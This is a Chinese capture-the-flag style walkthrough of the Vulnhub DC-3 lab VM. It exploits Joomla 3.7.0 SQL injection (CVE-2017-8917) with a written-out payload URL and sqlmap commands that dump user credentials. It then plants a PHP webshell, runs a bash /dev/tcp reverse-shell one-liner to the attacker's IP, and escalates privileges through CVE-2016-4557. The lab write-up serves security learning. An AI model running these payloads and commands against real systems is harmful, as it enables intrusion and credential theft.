标签：fullordering -- fields list 192.168 56.105 Vulnhub 靶场 DC3

一、环境简介

靶机：192.168.56.105
攻击机：kali win10
靶机下载地址：下载地址

二、开始复现

1.信息收集

arp-scan -l 收集到同网段的靶机IP 192.168.56.105

使用namp进行扫描
nmap -A -p 1-65535 192.168.56.105

发现80端口下有Joomla CMS,Joomla!是一套全球知名的内容管理系统,我们去访问一下查看一下。

我们这里用御剑扫描出他的后台管理地址
http://192.168.56.105/administrator/

暂时没有啥，我们继续看，在kali有个自带的joomla扫描程序 joomscan,可以看到详细版本与后台。版本是3.7.0

2.通过SQL注入漏洞进入获取用户名密码

这个版本是存在sql注入漏洞的（CVE-2017-8917）Joomla 3.7.0 QL注入漏洞

http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

说明是存在这个漏洞的，那么我们直接上salmap，我把语句放在下边，直接放结果图
 python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  数据库
 python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables 数据表
python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__ users" --columns  字段
 python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__ users" -C "username,password" --dump 数据

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
由于得出来的密码是向上面这样加密的，我们可以使用John去解密这个密码。密码为snoopy

3.进入后台getshell

在这里我们就可以写入我们的PHP了

保存之后，那么问题来了，我们如何知道我们木马的路径呢，我们百度可以看到，images的图片在这个路径，images和html是同一级目录。

所以木马在这，http://192.168.56.105/templates/beez3/html/。

我们成功连接。

4.提权

我们打开蚁剑的虚拟终端，将shell反弹到我们的kali上。

bash -c 'exec bash -i &>/dev/tcp/192.168.56.101/9999 <&1'

但是我们可以看到，我们的权限目前还是比较低的。

我们上传一个linux提权辅助工具，linux-exploit-suggester，下载地址https://github.com/mzet-/linux-exploit-suggester

chmod给他权限之后，然后去运行他。

我们可以看到脚本给了我们很多信息，我们使用CVE-2016-4557来进行提权。

因为他直接给了我们网址，我们直接下载下来，直接上传上去。

先将文件解压

进入文件夹后里面有一个exp文件，我们进行再度解压，进行执行文件。

我们可以看到提权成功，至于为什么要这么执行文件，我们可以去kali去看

flag直接到手

三、知识总结

1.在进行提权是，要学会提权工具的使用，大大的提高了我们的成功率和效率。
2.在使用工具前，要学会查看使用文档。

标签：fullordering,--,fields,list,192.168,56.105,Vulnhub,靶场,DC3
来源： https://www.cnblogs.com/CHOSEN1-Z13/p/16133263.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。